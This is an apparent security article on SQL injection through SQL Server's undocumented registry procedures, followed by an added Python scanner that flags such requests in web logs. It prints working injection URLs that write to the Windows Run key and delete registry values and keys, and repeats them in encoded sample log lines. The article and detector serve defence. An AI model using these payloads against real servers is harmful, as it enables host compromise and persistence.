Undocumented extended stored procedure injection in SQL Server
Many people do not realise that SQL Server ships with several extended stored procedures that can access the system registry. These extended stored procedures are undocumented. They have been available since SQL Server 7.0 and are still present in SQL Server 2000; they may be removed in a future release, but in the current SQL Server versions they provide read and write access to the system registry.
Because these extended stored procedures are frequently used by attackers who go through SQL Server to compromise the host, it is best to disable them in SQL Server.
Suppose http://127.0.0.1/view.asp?id=165 is vulnerable to SQL injection against SQL Server. xp_regwrite can then be used to write data to the registry.
Usage:
xp_regwrite root_key, subkey, value_name, value_type, value
http://127.0.0.1/view.asp?id=165;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','testvaluename','REG_SZ','Hello'
Note: two value types are supported, REG_SZ (a string) and REG_DWORD (an integer). A value is deleted with xp_regdeletevalue.
Usage:
xp_regdeletevalue root_key, subkey, value_name
http://127.0.0.1/view.asp?id=165;exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion','testvaluename'
xp_regdeletekey deletes a key, including all values under that key.
Usage:
xp_regdeletekey root_key, subkey
http://127.0.0.1/view.asp?id=165;exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\testkey'
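Disabling the procedures on the server, as the article recommends, is the fix; the web tier can additionally watch for the request shapes shown above. The following is an added example, not code from the article: it normalizes a query string the way the database would see it (repeated URL decoding, block comments treated as whitespace) and reports any attempt to EXEC one of the registry xprocs, then runs over a few constructed IIS-style log lines. The log field order and all sample lines are assumptions made for the example.

```python
"""Flag web requests that try to reach SQL Server's registry extended stored
procedures (xp_regwrite, xp_regdeletevalue, xp_regdeletekey and their
companions) through a query-string injection such as the ones shown above.

Added example for this article, not code from the original. The log lines are
constructed and follow an IIS W3C-style field order that is assumed here:
date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
"""
import re
from urllib.parse import unquote_plus

# The three procedures named in the article plus the other xp_reg* procedures
# that ship with them in master (all undocumented).
REGISTRY_XPROCS = (
    "xp_regwrite", "xp_regdeletevalue", "xp_regdeletekey",
    "xp_regread", "xp_regenumvalues", "xp_regenumkeys",
    "xp_regaddmultistring", "xp_regremovemultistring",
)

# After normalization this matches "exec master.dbo.xp_regwrite",
# "EXEC master..xp_regdeletevalue", "execute master.xp_regdeletekey" and a
# bare "exec xp_regread"; the procedure name is captured in group 1.
_XPROC_RE = re.compile(
    r"\bexec(?:ute)?\s+"
    r"(?:master\s*\.\s*(?:dbo\s*\.\s*|\.\s*)?)?"
    r"(" + "|".join(REGISTRY_XPROCS) + r")\b",
    re.IGNORECASE,
)


def normalize(query: str, max_rounds: int = 3) -> str:
    """Bring a raw cs-uri-query into the form the database server would see:
    URL-decode (repeated, so double encoding does not hide the keyword),
    treat SQL block comments as whitespace, and collapse whitespace runs."""
    text = query
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.DOTALL)
    return re.sub(r"\s+", " ", text).strip()


def find_registry_xproc(query: str):
    """Return the lower-cased xproc name the query tries to EXEC, or None.
    A mere mention of the name (e.g. a help-page topic) is not reported."""
    match = _XPROC_RE.search(normalize(query))
    return match.group(1).lower() if match else None


def scan_log(lines):
    """Yield (cs-uri-stem, xproc, raw cs-uri-query) for every log line whose
    query string reaches a registry xproc. Header lines starting with '#'
    and short or empty lines are skipped."""
    for line in lines:
        if not line or line.startswith("#"):
            continue
        fields = line.split(" ")
        if len(fields) < 7:
            continue
        stem, query = fields[4], fields[5]
        hit = find_registry_xproc(query)
        if hit:
            yield stem, hit, query


# Constructed sample log: one normal request, the three payload shapes from the
# article (plain, percent-encoded, double-encoded), and a harmless mention.
SAMPLE_LOG = (
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status\n"
    "2024-01-01 10:00:01 10.0.0.5 GET /view.asp id=165 200\n"
    "2024-01-01 10:00:02 10.0.0.9 GET /view.asp "
    "id=165;exec+master.dbo.xp_regwrite+'HKEY_LOCAL_MACHINE',"
    "'Software\\Microsoft\\Windows\\CurrentVersion\\Run','testvaluename','REG_SZ','Hello' 500\n"
    "2024-01-01 10:00:03 10.0.0.9 GET /view.asp "
    "id=165;EXEC%20master..XP_REGDELETEVALUE%20'HKEY_LOCAL_MACHINE',"
    "'Software\\Microsoft\\Windows\\CurrentVersion','testvaluename' 500\n"
    "2024-01-01 10:00:04 10.0.0.9 GET /view.asp "
    "id=165%3Bexec%2520master.xp_regdeletekey%2520'HKEY_LOCAL_MACHINE',"
    "'Software\\Microsoft\\Windows\\CurrentVersion\\testkey' 500\n"
    "2024-01-01 10:00:05 10.0.0.7 GET /help.asp topic=xp_regwrite 200\n"
)


def scan_sample():
    """Run the scanner over the constructed sample and return the hits."""
    return list(scan_log(SAMPLE_LOG.splitlines()))


if __name__ == "__main__":
    for stem, xproc, query in scan_sample():
        print(f"ALERT {stem}: {xproc} via {query}")
```

The match deliberately requires an EXEC keyword in front of the procedure name, so a page that merely mentions xp_regwrite is not reported, while the double-encoded variant is still caught because decoding is repeated until the string stops changing.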